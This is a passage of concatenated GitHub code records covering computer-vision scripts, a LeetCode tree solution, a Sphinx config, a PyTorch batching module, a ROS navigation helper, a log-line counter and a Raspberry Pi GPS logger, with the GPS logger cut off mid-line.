out.release()\n\n # Closes all the frames\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()\n","repo_name":"UCSD-E4E/baboon-tracking-archive","sub_path":"old_approaches/variable_background_tracking/test_dilate.py","file_name":"test_dilate.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70293300942","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def pathSum(self, root, sum):\n \"\"\"\n :type root: TreeNode\n :type sum: int\n :rtype: int\n \"\"\"\n self.count = 0\n def test(root, sum):\n if not root:\n return 0\n if root.val == sum:\n return 1 + test(root.left, sum - root.val) + test(root.right, sum - root.val)\n else:\n if not root.left and not root.right:\n return 0\n else:\n return test(root.left, sum - root.val) + test(root.right, sum - root.val)\n def preorder(root, sum):\n if not root:\n return\n if root:\n temp = test(root, sum)\n if temp:\n self.count += temp\n if root.left:\n preorder(root.left, sum)\n if root.right:\n preorder(root.right, sum)\n\n preorder(root, sum)\n return self.count\n\n ","repo_name":"CrazyCoder4Carrot/leetcode","sub_path":"python/401-450/437. Path Sum III.py","file_name":"437. Path Sum III.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"39148448089","text":"# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = 'Inkwell API'\ncopyright = '2023, Iheanyi Oziegbe'\nauthor = 'Iheanyi Oziegbe'\nrelease = '0.1'\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = []\n\ntemplates_path = ['_templates']\nexclude_patterns = []\n\n\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = 'alabaster'\nhtml_static_path = ['_static']\n\n# custom css\nhtml_css_files = [\n 'css/custom.css',\n]\n\n","repo_name":"useinkwell/Inkwell-app","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2216216832","text":"from typing import List, Tuple, Dict, Callable\n\nimport numpy as np\nimport torch\nfrom PIL import Image\n\nfrom dataset.multicamera_video import MulticameraVideo\nfrom utils.lib_3d.pose_parameters import PoseParametersNumpy\n\n\nclass BatchElement:\n\n def __init__(self, observations: List[Tuple[Image.Image]], actions: List, rewards: List[int], metadata: List[List[Dict]], dones: List[bool],\n cameras: List[PoseParametersNumpy], focals: List[float], bounding_boxes: List[np.ndarray], bounding_boxes_validity: List[np.ndarray],\n observations_paths: List[List[str]], global_frame_indexes: List[int], video_frame_indexes: List[int], video_index: int, video: MulticameraVideo, transforms,\n optical_flows: List[Tuple[np.ndarray]]=None, optical_flow_transforms: Callable=None, keypoints: List[np.ndarray]=None,\n keypoints_validity: List[np.ndarray]=None, object_poses: List[List[PoseParametersNumpy]]=None, crop_regions: List[List[List[float]]]=None):\n '''\n Constructs a batch element\n\n :param observations: list of size (observations_count, observation_stacking, cameras_count) frames each from the most recent to the oldest\n :param actions: list of size (observations_count) actions\n :param rewards: list of size (observations_count) rewards\n :param metadata: list of size (observations_count, cameras_count) metadata\n :param dones: list of size (observations_count) booleans representing whether the episode has ended\n :param cameras: list of size (observations_count, cameras_count) camera poses\n :param focals: list of size (observations_count, cameras_count) camera focals\n :param bounding_boxes: list of size (observations_count, cameras_count) bounding boxes for each dynamic object instance\n :param bounding_boxes_validity: list of size (observations_count, cameras_count) bounding boxes validities for each dynamic object instance\n :param observations_paths: list of size (observations_count, cameras_count) strings with locations on disk of each frame, None if the frame is not on disk\n :param global_frame_indexes: list of size (observations_count) of integers representing the global indexes corresponding to the frames\n :param video_frame_indexes: list of size (observations_count) tensor of integers representing indexes in the original videos corresponding to the frames\n :param video_index: index of the video in the dataset\n :param video: the original video object\n :param transforms: transform to apply to each frame in the observations. Must return torch tensors\n :param optical_flow: list of size (observations_count, cameras_count) optical flows\n :param optical_flow_transforms: transform to apply to each optical flow. Must be not None if optical flows are present. Must return torch tensors\n :param keypoints: list of size (observations_count, cameras_count) keypoints for each dynamic object instance\n :param keypoints_validity: list of size (observations_count, cameras_count) keypoints validities for each dynamic object instance\n :param object_poses: list of size (observations_count) with pose parameters for each dynamic object instance\n :param crop_regions: lsit of size (observations_count, cameras_count) with crop regions (left, top, right, bottom) normalized in [0, 1]\n '''\n\n self.observations_count = len(observations)\n self.observations_stacking = len(observations[0])\n self.cameras_count = len(observations[0][0])\n\n if len(actions) != self.observations_count or len(rewards) != self.observations_count or len(dones) != self.observations_count or len(cameras) != self.observations_count \\\n or self.observations_count != len(focals) or self.observations_count != len(bounding_boxes) or self.observations_count != len(bounding_boxes_validity) \\\n or self.observations_count != len(global_frame_indexes) or self.observations_count != len(video_frame_indexes):\n raise Exception(\"Missing elements in the current batch\")\n if len(cameras[0]) != self.cameras_count:\n raise Exception(\"Missing elements in the current batch\")\n\n # Checks the number of dynamic object instances in the first observation of the first camera [0][0]\n if bounding_boxes[0][0].shape[1] != bounding_boxes_validity[0][0].shape[0]:\n raise Exception(f\"Bounding boxes contain {bounding_boxes[0][0].shape[1]} dynamic object instances, but\"\n f\"bounding boxes valitities contain {bounding_boxes_validity[0][0].shape[0]} dynamic object instances\")\n\n self.actions = actions\n self.rewards = rewards\n self.metadata = metadata\n self.dones = dones\n self.cameras = cameras\n self.focals = focals\n self.bounding_boxes = bounding_boxes\n self.bounding_boxes_validity = bounding_boxes_validity\n self.observations_paths = observations_paths\n self.global_frame_indexes = global_frame_indexes\n self.video_frame_indexes = video_frame_indexes\n self.video_index = video_index\n self.video = video\n self.transforms = transforms\n self.optical_flow_transforms = optical_flow_transforms\n self.keypoints = keypoints\n self.keypoints_validity = keypoints_validity\n self.object_poses = object_poses\n self.crop_regions = crop_regions\n\n # Transforms each observation and puts them in the (observations_count, cameras_count, observation_stacking order\n transformed_observations = []\n for observation_idx in range(self.observations_count):\n current_l1_observations = []\n for camera_idx in range(self.cameras_count):\n current_l2_observations = []\n for stack_idx in range(self.observations_stacking):\n current_observation = observations[observation_idx][stack_idx][camera_idx]\n # Applies a transformation if present\n if self.transforms is not None:\n current_observation = self.transforms(current_observation)\n current_l2_observations.append(current_observation)\n if torch.is_tensor(current_l2_observations[0]):\n current_l2_observations = torch.cat(current_l2_observations, dim=0)\n else:\n assert(len(current_l2_observations) == 1) # need observation stacking = 1 if images are not tensors\n current_l2_observations = current_l2_observations[0] # Eliminates stacking dimension\n current_l1_observations.append(current_l2_observations)\n if torch.is_tensor(current_l1_observations[0]):\n current_l1_observations = torch.stack(current_l1_observations)\n transformed_observations.append(current_l1_observations)\n if torch.is_tensor(transformed_observations[0]):\n transformed_observations = torch.stack(transformed_observations)\n self.observations = transformed_observations\n\n # Transforms each optical flow and puts them in the (observations_count, cameras_count) order\n self.optical_flows = None\n if optical_flows is not None:\n # Applies transformations to the optical flows if present\n if self.optical_flow_transforms is not None:\n optical_flows = [[self.optical_flow_transforms(current_flow) for current_flow in current_camera_flows] for current_camera_flows in optical_flows]\n else:\n raise Exception(\"Optical Flow transformations are None, but must at least include the conversion from Numpy to PyTorch\")\n # Stacks the camera dimension\n optical_flows = [torch.stack(current_camera_flows, dim=0) for current_camera_flows in optical_flows]\n # Stacks the observations_count dimention\n self.optical_flows = torch.stack(optical_flows, dim=0)\n\n # Converts arrays to torch\n self.cameras = [[current_element.to_torch() for current_element in current_camera] for current_camera in self.cameras]\n self.bounding_boxes = [[torch.from_numpy(current_element) for current_element in current_camera] for current_camera in self.bounding_boxes]\n self.bounding_boxes_validity = [[torch.from_numpy(current_element) for current_element in current_camera] for current_camera in self.bounding_boxes_validity]\n if self.has_keypoints(): # Converts keypoints to torch\n self.keypoints = [[torch.from_numpy(current_element) for current_element in current_camera] for current_camera in self.keypoints]\n self.keypoints_validity = [[torch.from_numpy(current_element) for current_element in current_camera] for current_camera in self.keypoints_validity]\n if self.has_object_poses(): # Converts object poses to torch\n self.object_poses = [[current_object_pose.to_torch() for current_object_pose in current_observation_results] for current_observation_results in self.object_poses]\n if self.has_crop_regions():\n self.crop_regions = torch.as_tensor(self.crop_regions) # tensor (observations_count, cameras_count, 4)\n\n def has_keypoints(self) -> bool:\n '''\n Check whether keypoints data is available\n :return: True if keypoints data is present\n '''\n\n return self.keypoints is not None\n\n def has_flow(self) -> bool:\n '''\n Check whether optical flow data is available\n :return: True if optical flow data is present\n '''\n\n return self.optical_flows is not None\n\n def has_object_poses(self) -> bool:\n '''\n Check whether object poses are available\n :return: True if object poses are available\n '''\n\n return self.object_poses is not None\n\n def has_crop_regions(self) -> bool:\n '''\n Check whether crop regions are available\n :return: True if crop regions are available\n '''\n\n return self.crop_regions is not None\n\n\nclass Batch:\n\n def __init__(self, observations: torch.Tensor, actions: torch.Tensor, rewards: torch.Tensor, metadata: List[List[List[Dict]]], dones: torch.Tensor,\n camera_rotation: torch.Tensor, camera_translation: torch.Tensor, focals: torch.Tensor, bounding_boxes: torch.Tensor, bounding_boxes_validity: torch.Tensor,\n observations_paths: np.ndarray, global_frame_indexes: torch.Tensor, video_frame_indexes: torch.Tensor, video_indexes: torch.Tensor, videos: List[MulticameraVideo],\n optical_flows: torch.Tensor=None, keypoints: torch.Tensor=None, keypoints_validity: torch.Tensor=None,\n object_rotation: torch.Tensor=None, object_translation: torch.Tensor=None, crop_regions: torch.Tensor=None):\n '''\n\n :param observations: (bs, observations_count, cameras_count, 3 * observations_stacking, h, w) tensor with observed images\n :param actions: (bs, observations_count) tensor with observed actions\n :param rewards: (bs, observations_count) tensor with observed rewards\n :param metadata: list of size (bs, observations_count, cameras_count) with batch metadata\n :param dones: (bs, observations_count) tensor with observed dones\n :param camera_rotation (bs, observations_count, cameras_count, 3) tensor with camera rotations\n :param camera_translation (bs, observations_count, cameras_count, 3) tensor with camera translations\n :param focals (bs, observations_count, cameras_count) tensor with camera focals\n :param bounding_boxes (bs, observations_count, cameras_count, 4, dynamic_object_count) tensor with bounding boxes for dynamic object instances\n :param bounding_boxes_validity (bs, observations_count, cameras_count, dynamic_object_count) tensor with bounding boxes validity for dynamic object instances\n :param observations_paths (bs, observations_count, cameras_count) string array with paths for each observation on disk, None if observation is not present on disk\n :param global_frame_indexes: (bs, observations_count) tensor of integers representing the global indexes corresponding to the frames\n :param video_frame_indexes: (bs, observations_count) tensor of integers representing indexes in the original videos corresponding to the frames\n :param video_indexes: (bs) tensor of integers representing indexes of each video in the dataset\n :param videos: list of original bs videos\n :param optical_flows: (bs, observations_count, cameras_count, 2, h, w) tensor with optical flows\n :param keypoints (bs, observations_count, cameras_count, keypoints_count, 3, dynamic_object_count) tensor with keypoints for dynamic object instances\n :param keypoints_validity (bs, observations_count, cameras_count, dynamic_object_count) tensor with keypoints validity for dynamic object instances\n :param object_rotation (bs, observations_count, dynamic_object_count) tensor with camera rotations\n :param object_translation (bs, observations_count, dynamic_object_count) tensor with camera translations\n :param crop_regions (bs, observations_count, cameras_count, 4) tensor with crop regions normalized in [0, 1]\n '''\n\n self.size = actions.size(1)\n\n self.observations = observations\n self.actions = actions\n self.rewards = rewards\n self.metadata = metadata\n self.dones = dones\n self.camera_rotation = camera_rotation\n self.camera_translation = camera_translation\n self.focals = focals\n self.bounding_boxes = bounding_boxes\n self.bounding_boxes_validity = bounding_boxes_validity\n self.observations_paths = observations_paths\n self.global_frame_indexes = global_frame_indexes\n self.video_frame_indexes = video_frame_indexes\n self.video_indexes = video_indexes\n self.video = videos\n\n self.keypoints = keypoints\n self.keypoints_validity = keypoints_validity\n\n self.optical_flows = optical_flows\n\n self.object_rotation = object_rotation\n self.object_translation = object_translation\n\n self.crop_regions = crop_regions\n\n def to_cuda(self):\n '''\n Transfers tensors to the gpu\n :return:\n '''\n self.observations = self.observations.cuda()\n self.actions = self.actions.cuda()\n self.rewards = self.rewards.cuda()\n self.dones = self.dones.cuda()\n self.camera_rotation = self.camera_rotation.cuda()\n self.camera_translation = self.camera_translation.cuda()\n self.focals = self.focals.cuda()\n self.bounding_boxes = self.bounding_boxes.cuda()\n self.bounding_boxes_validity = self.bounding_boxes_validity.cuda()\n self.global_frame_indexes = self.global_frame_indexes.cuda()\n self.video_frame_indexes = self.video_frame_indexes.cuda()\n self.video_indexes = self.video_indexes.cuda()\n\n if self.has_flow():\n self.optical_flows.cuda()\n\n if self.has_keypoints():\n self.keypoints = self.keypoints.cuda()\n self.keypoints_validity = self.keypoints_validity.cuda()\n\n if self.has_object_poses():\n self.object_rotation = self.object_rotation.cuda()\n self.object_translation = self.object_translation.cuda()\n\n def to_tuple(self, cuda=True) -> Tuple:\n '''\n Converts the batch to an input tuple\n :param cuda If True transfers the tensors to the gpu\n :return: (observations, actions, rewards, dones, camera_rotation, camera_translation, focals, bounding_boxes, bounding_boxes_validity, global_frame_indexes, video_frame_indexes, video_indexes) tuple\n '''\n\n if cuda:\n self.to_cuda()\n\n # Do not return optical flow not to break backward compatibility of the code\n return self.observations, self.actions, self.rewards, self.dones, self.camera_rotation, self.camera_translation, \\\n self.focals, self.bounding_boxes, self.bounding_boxes_validity, self.global_frame_indexes, self.video_frame_indexes, self.video_indexes\n\n def to_keypoints_typle(self, cuda=True):\n '''\n Converts the batch keypoints information to an input tuple\n :param cuda If True transfers the tensors to the gpu\n :return: (keypoints, keypoints_validity) tuple\n '''\n\n if not self.has_keypoints():\n raise Exception(\"Keypoints were requested from the batch, but the batch has no keypoints information\")\n\n if cuda:\n self.to_cuda()\n\n return self.keypoints, self.keypoints_validity\n\n def to_object_poses_tuple(self, cuda=True):\n '''\n Converts the batch object pose information to an input tuple\n :param cuda If True transfers the tensors to the gpu\n :return: (object_rotation, object_translation) tuple\n '''\n\n if not self.has_object_poses():\n raise Exception(\"Object poses were requested from the batch, but the batch has no object pose information\")\n\n if cuda:\n self.to_cuda()\n\n return self.object_rotation, self.object_translation\n\n def pin_memory(self):\n\n self.observations.pin_memory()\n self.actions.pin_memory()\n self.rewards.pin_memory()\n self.dones.pin_memory()\n self.camera_rotation.pin_memory()\n self.camera_translation.pin_memory()\n self.focals.pin_memory()\n self.bounding_boxes.pin_memory()\n self.bounding_boxes_validity.pin_memory()\n self.global_frame_indexes.pin_memory()\n self.video_frame_indexes.pin_memory()\n self.video_indexes.pin_memory()\n\n if self.has_flow():\n self.optical_flows.pin_memory()\n\n if self.has_keypoints():\n self.keypoints.pin_memory()\n self.keypoints_validity.pin_memory()\n\n if self.has_object_poses():\n self.object_rotation.pin_memory()\n self.object_translation.pin_memory()\n\n return self\n\n def has_keypoints(self) -> bool:\n '''\n Check whether keypoints data is available\n :return: True if keypoints data is present\n '''\n\n return self.keypoints is not None\n\n def has_flow(self) -> bool:\n '''\n Check whether optical flow data is available\n :return: True if optical flow data is present\n '''\n\n return self.optical_flows is not None\n\n def has_object_poses(self) -> bool:\n '''\n Check whether object poses are available\n :return: True if object poses are available\n '''\n\n return self.object_rotation is not None and self.object_translation is not None\n\n def has_crop_regions(self) -> bool:\n '''\n Check whether crop regions data is available\n :return: True if crop regions data is present\n '''\n\n return self.crop_regions is not None\n\n\ndef single_batch_elements_collate_fn(batch: List[BatchElement]) -> Batch:\n '''\n Creates a batch starting from single batch elements\n\n :param batch: List of batch elements\n :return: Batch representing the passed batch elements\n '''\n\n observations_tensor = torch.stack([current_element.observations for current_element in batch])\n\n actions_tensor = torch.stack([torch.tensor(current_element.actions, dtype=torch.int) for current_element in batch], dim=0)\n rewards_tensor = torch.stack([torch.tensor(current_element.rewards) for current_element in batch], dim=0)\n dones_tensor = torch.stack([torch.tensor(current_element.dones) for current_element in batch], dim=0)\n\n # Converts the PoseParameter objects into separate rotation and translation lists of dimension (bs, observations_count, cameras_count)\n all_camera_rotations = []\n all_camera_translations = []\n for current_batch_element in batch:\n l1_list_rotation = []\n l1_list_translation = []\n for current_observation in current_batch_element.cameras:\n l2_list_rotation = []\n l2_list_translation = []\n for current_camera in current_observation:\n current_rotation, current_translation = current_camera.get_rotation_translation()\n l2_list_rotation.append(current_rotation)\n l2_list_translation.append(current_translation)\n l1_list_rotation.append(torch.stack(l2_list_rotation))\n l1_list_translation.append(torch.stack(l2_list_translation))\n all_camera_rotations.append(torch.stack(l1_list_rotation))\n all_camera_translations.append(torch.stack(l1_list_translation))\n\n camera_rotation_tensor = torch.stack(all_camera_rotations)\n camera_translation_tensor = torch.stack(all_camera_translations)\n\n focals = torch.as_tensor([current_element.focals for current_element in batch], dtype=torch.float)\n bounding_boxes = torch.stack([torch.stack([torch.stack(current_camera_element) for current_camera_element in current_element.bounding_boxes]) for current_element in batch])\n bounding_boxes_validity = torch.stack([torch.stack([torch.stack(current_camera_element) for current_camera_element in current_element.bounding_boxes_validity]) for current_element in batch])\n observations_paths = np.asarray([current_element.observations_paths for current_element in batch], dtype=object) # dtype object to support strings of arbitrary length\n\n keypoints = None\n keypoints_validity = None\n if batch[0].has_keypoints():\n keypoints = torch.stack([torch.stack([torch.stack(current_camera_element) for current_camera_element in current_element.keypoints]) for current_element in batch])\n keypoints_validity = torch.stack([torch.stack([torch.stack(current_camera_element) for current_camera_element in current_element.keypoints_validity]) for current_element in batch])\n\n global_frame_indexes_tensor = torch.stack([torch.tensor(current_element.global_frame_indexes, dtype=torch.long) for current_element in batch], dim=0)\n video_frame_indexes_tensor = torch.stack([torch.tensor(current_element.video_frame_indexes, dtype=torch.long) for current_element in batch], dim=0)\n video_indexes_tensor = torch.tensor([current_element.video_index for current_element in batch], dtype=torch.long)\n\n batch_metadata = [batch_element.metadata for batch_element in batch]\n\n videos = [current_element.video for current_element in batch]\n\n # Stacks the optical flow if present\n optical_flows_tensor = None\n if batch[0].has_flow():\n optical_flows_tensor = torch.stack([current_element.optical_flows for current_element in batch])\n\n # Converts the PoseParameter object for object poses into rotation and translation tensors\n object_rotation_tensor = None\n object_translation_tensor = None\n if batch[0].has_object_poses():\n all_object_rotations = []\n all_object_translations = []\n for current_batch_element in batch:\n l1_list_rotation = []\n l1_list_translation = []\n for current_observation in current_batch_element.object_poses:\n l2_list_rotation = []\n l2_list_translation = []\n for current_pose in current_observation:\n current_rotation, current_translation = current_pose.get_rotation_translation()\n l2_list_rotation.append(current_rotation)\n l2_list_translation.append(current_translation)\n l1_list_rotation.append(torch.stack(l2_list_rotation, dim=-1)) # Stacks on the last dimension to pose the object dimension in the last position\n l1_list_translation.append(torch.stack(l2_list_translation, dim=-1))\n all_object_rotations.append(torch.stack(l1_list_rotation))\n all_object_translations.append(torch.stack(l1_list_translation))\n\n object_rotation_tensor = torch.stack(all_object_rotations)\n object_translation_tensor = torch.stack(all_object_translations)\n\n crop_regions = None\n if batch[0].has_crop_regions():\n crop_regions = torch.stack([batch_element.crop_regions for batch_element in batch])\n\n return Batch(observations_tensor, actions_tensor, rewards_tensor, batch_metadata, dones_tensor, camera_rotation_tensor,\n camera_translation_tensor, focals, bounding_boxes, bounding_boxes_validity, observations_paths, global_frame_indexes_tensor,\n video_frame_indexes_tensor, video_indexes_tensor, videos, optical_flows=optical_flows_tensor,\n keypoints=keypoints, keypoints_validity=keypoints_validity, object_rotation=object_rotation_tensor,\n object_translation=object_translation_tensor, crop_regions=crop_regions)\n\n\ndef multiple_batch_elements_collate_fn(batch: List[Tuple[BatchElement]]) -> List[Batch]:\n '''\n Creates a batch starting from groups of corresponding batch elements\n\n :param batch: List of groups of batch elements\n :return: A List with cardinality equal to the number of batch elements of each group where\n the ith tuple item is the batch of all elements in the ith position in each group\n '''\n\n cardinality = len(batch[0])\n\n # Transforms the ith element of each group into its batch\n output_batches = []\n for idx in range(cardinality):\n # Extract ith element\n current_batch_elements = [current_elements_group[idx] for current_elements_group in batch]\n # Creates ith batch\n current_output_batch = single_batch_elements_collate_fn(current_batch_elements)\n output_batches.append(current_output_batch)\n\n return output_batches\n\n\n\n\n\n\n\n\n\n","repo_name":"willi-menapace/PlayableEnvironments","sub_path":"dataset/batching.py","file_name":"batching.py","file_ext":"py","file_size_in_byte":25752,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"47"} +{"seq_id":"23430694782","text":"import cv2\r\n\r\nfrom unet.network import network\r\nfrom colors import COLORS\r\nfrom change_color import ColorChanger\r\n\r\nclass ColorInvertor():\r\n\r\n def __init__(self):\r\n self.net = network()\r\n self.centroid = None\r\n self.changer = ColorChanger()\r\n\r\n self.__load_unet()\r\n\r\n def __load_unet(self):\r\n self.net.load_network()\r\n \r\n def __recalculate_color(self):\r\n self.changer.init_img = self.init_img\r\n self.changer.mask_img = self.mask_img\r\n self.changer.pref_color = COLORS[self.recolor]\r\n\r\n self.final_img = self.changer.BalancedAlgorithm()\r\n\r\n self.final_img = cv2.cvtColor(self.final_img, cv2.COLOR_HSV2BGR)\r\n\r\n\r\n def recolor_hair_image(self, img_name, color):\r\n self.init_img = cv2.imread(img_name)\r\n self.recolor = color\r\n\r\n # start network\r\n self.mask_img = self.net.proceed_image(self.init_img)\r\n\r\n self.__recalculate_color()\r\n\r\n cv2.imshow('Result', self.final_img)\r\n cv2.waitKey(0)\r\n\r\n def recolor_hair_video(self, color):\r\n self.recolor = color\r\n cap = cv2.VideoCapture(0)\r\n\r\n while True:\r\n _, frame = cap.read()\r\n self.init_img = cv2.resize(frame, (600,400))\r\n\r\n # start network\r\n self.mask_img = self.net.proceed_image(self.init_img)\r\n\r\n self.__recalculate_color()\r\n cv2.imshow('a', self.final_img)\r\n\r\n key = cv2.waitKey(1)\r\n if key == ord('q'):\r\n break\r\n\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n","repo_name":"RadFam/hair-colorizing","sub_path":"work_color_invertor.py","file_name":"work_color_invertor.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"10048289023","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom geometry_msgs.msg import Twist, Vector3, Pose, Vector3Stamped\n\ndef Go_to (media, mode, centro, dist):\n\n\tvel = Twist(Vector3(0,0,0), Vector3(0,0,0))\n\n\tif len(media) != 0 and len(centro) != 0:\n\n\t\tif mode != \"Aproach started\" and mode != \"In front of object\":\n\t\t\tif (media[0] > centro[0]):\n\t\t\t\tvel = Twist(Vector3(0.1,0,0), Vector3(0,0,-0.1))\n\t\t\t\tmode = \"Searching\"\n\n\t\t\tif (media[0] < centro[0]):\n\t\t\t\tvel = Twist(Vector3(0.1,0,0), Vector3(0,0,0.1))\n\t\t\t\tmode = \"Searching\"\n\n\t\t\tif (abs(media[0] - centro[0]) < 10):\n\t\t\t\tvel = Twist(Vector3(0.1,0,0), Vector3(0,0,0))\n\t\t\t\tmode = \"Tracking\"\n\n\t\tif dist > 1.5 and mode == \"Aproach started\":\n\t\t\tmode = \"Searching\"\n\n\t\tif dist < 1.5 and (mode == \"Tracking\" or mode == \"Aproach started\"):\n\t\t\tvel = Twist(Vector3(0.1,0,0), Vector3(0,0,0))\n\t\t\tmode = \"Aproach started\"\n\n\t\tif dist < 0.40 and (mode == \"In front of object\" or mode == \"Aproach started\"):\n\t\t\tvel = Twist(Vector3(0,0,0), Vector3(0,0,0))\n\t\t\tmode = \"In front of object\"\n\t\n\treturn vel, mode\n","repo_name":"marcosvds/P1_RoboticaComputacional_2020.1","sub_path":"scripts/cor_A4.py","file_name":"cor_A4.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1631669073","text":"x='201811123023'\r\nnum=0\r\n\r\nwith open(r'C:\\Users\\PC\\Desktop\\log_files\\201811123023.log',mode='r',encoding='utf8') as f:\r\n \r\n for line in f:\r\n list1=line.split(' ')\r\n str1=list1[1]\r\n list2=str1.split(':')\r\n str2=list2[1]\r\n list3=str2.split(',')\r\n str3=list3[0]\r\n if str3==x:\r\n num=num+1\r\n\r\nprint(num)\r\n","repo_name":"CUCSec/text-file-process-yangyifei0619","sub_path":"homework1(bingo).py","file_name":"homework1(bingo).py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16133935285","text":"#!/usr/bin/python\n\nimport sys\nimport time\nimport difflib\nimport pigpio\nimport pynmea2\nimport os\nimport datetime\nfrom datetime import timedelta\nimport RPi.GPIO as GPIO\n\n# Serial pins for GPS\nRX = 23\nEN = 24\n\n# Pins for GPS button and LED\nGPS_LED = 13\nGPS_Button = 11\n\n# Read data from the GPS\ndef readFromGPS(pi, excess, buffer, bufferIndex, timestampBuffer):\n (dataSize, data) = pi.bb_serial_read(RX)\n if dataSize > 0:\n allStr = excess + str(data)\n excess = ''\n senStartCount = allStr.count('$')\n\n # This section should probably be made more robust:\n # if the data is between 2 dollar signs is corrupted/missing it will \n # still be appended to the buffer; if this happens a lot we can waste \n # a lot of time unnecessarily flushing the buffer\n if senStartCount > 1: # contains a whole sentence\n sentStart = allStr.find('$')\n sentEnd = allStr[sentStart+1:].find('$') - 1\n excess = allStr[sentEnd+1:]\n sentence = allStr[sentStart:sentEnd]\n buffer.append(sentence)\n bufferIndex += 1\n sysTimestamp = str(datetime.datetime.now().time())[0:11]\n timestampBuffer.append(sysTimestamp)\n elif senStartCount == 1: # discard anything before start of sentence\n sentStart = allStr.find('$')\n excess = allStr[sentStart:]\n\n return (excess, buffer, bufferIndex, timestampBuffer)\n\n# Clear out the buffer\ndef flushBuffer(buffer, bufferIndex, timestampBuffer):\n GPIO.output(GPS_LED, GPIO.LOW)\n tsbi = 0\n for sentence in buffer:\n print(sentence)\n try:\n msg = pynmea2.parse(sentence)\n try:\n GPSTime = str(msg.timestamp.strftime(\"%H:%M:%S\"))\n except:\n GPSTime = '\\t'\n write = timestampBuffer[tsbi] + \",\\t\" + GPSTime + \",\\t\" + str(msg.latitude) + \",\\t\" + str(msg.longitude) + \",\\t\" + str(msg.altitude) + \"\\n\"\n file.write(write)\n file.flush()\n\n # flash LED to indicate file is saving\n GPIO.output(GPS_LED, GPIO.HIGH)\n time.sleep(0.001)\n GPIO.output(GPS_LED, GPIO.LOW)\n\n tsbi += 1\n except:\n print(\"unable to parse sentence: \" + sentence)\n GPIO.output(GPS_LED, GPIO.LOW)\n \n GPIO.output(GPS_LED, GPIO.LOW)\n return ([], 0, [])\n\n# Initialise the GPS module and prepare for file logging\ndef init(pi, file):\n # Initialize serial emulation library\n pi = pigpio.pi()\n pi.set_mode(RX, pigpio.INPUT)\n pi.set_mode(EN, pigpio.OUTPUT)\n pi.write(EN, True)\n try:\n pi.bb_serial_read_open(RX, 9600, 8)\n except Exception as e:\n pi.stop()\n raise ValueError(e)\n\n # Get a timestamp in order to differentiate from other log files (HH:MM:SS)\n refTime = str(datetime.datetime.now().time())[0:8]\n filename = \"/home/pi/GPS/log_gps_\" + refTime + \".csv\"\n \n # Open file for logging\n file = open(filename, \"a\")\n # Create file if not present\n if os.stat(filename).st_size == 0:\n file.write(\"System_Timestamp,\\tGPS_Timestamp\\tLatitude,\\tLongitude,\\tAltitude\\n\")\n\n GPIO.setmode(GPIO.BOARD) # Numbers GPIOs by physical location\n GPIO.setup(GPS_LED, GPIO.OUT) # Set GPS_LEDPin's mode to output\n GPIO.setup(GPS_Button, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Set GPS_ButtonPin's mode as input\n\n # Flash LED twice when initialisation is complete\n GPIO.output(GPS_LED, 1)\n time.sleep(0.1)\n GPIO.output(GPS_LED, 0)\n time.sleep(0.1)\n GPIO.output(GPS_LED, 1)\n time.sleep(0.1)\n GPIO.output(GPS_LED, 0)\n \n return (pi, file)\n\n# If something fails flash SOS in morse\ndef failstate():\n GPIO.output(GPS_LED, GPIO.HIGH) # GPS LED on\n time.sleep(1)\n print(\"S\")\n GPIO.output(GPS_LED, GPIO.LOW) # GPS LED off\n \n time.sleep(0.3)\n \n GPIO.output(GPS_LED, GPIO.HIGH) # GPS LED on\n time.sleep(0.5)\n print(\"O\")\n GPIO.output(GPS_LED, GPIO.LOW) # GPS LED off\n \n time.sleep(0.3)\n \n GPIO.output(GPS_LED, GPIO.HIGH) # GPS LED on\n time.sleep(1)\n print(\"S\")\n GPIO.output(GPS_LED, GPIO.LOW) # GPS LED off\n\n# clean up GPIO pins\ndef destroy():\n GPIO.output(GPS_LED, GPIO.LOW) # GPS LED off\n GPIO.cleanup() # Release resource\n try:\n pi.stop()\n except:\n print(\"failed to stop pigpio\")\n\n# main logging loop\ndef core(pi, file):\n GPS_Pressed = False\n GPS_Enabled = False\n GPS_Prev = False\n GPS_Curr = False\n\n buffer = [] # buffer for separated sentences (in raw format)\n bufferSize = 60 # buffer size of 60 gives 1 minute of data when sensor is operating at 1 hz\n bufferIndex = 0 # position in buffer\n excess = '' # used for storing imcomplete sentences between cycles\n\n timestampBuffer = []\n\n try:\n # main loop\n while True:\n GPS_Prev = GPS_Enabled\n GPS_Curr = not GPIO.input(GPS_Button)\n\n # Toggle logging on and off with pushbutton\n if GPS_Pressed and not GPS_Curr:\n GPS_Pressed = False\n print('GPS Button Released')\n elif not GPS_Pressed and GPS_Curr:\n GPS_Pressed = True\n print('GPS Button Pressed')\n GPS_Enabled = not GPS_Enabled # Toggle GPS logging\n \n if GPS_Enabled:\n # Turn on LED, read 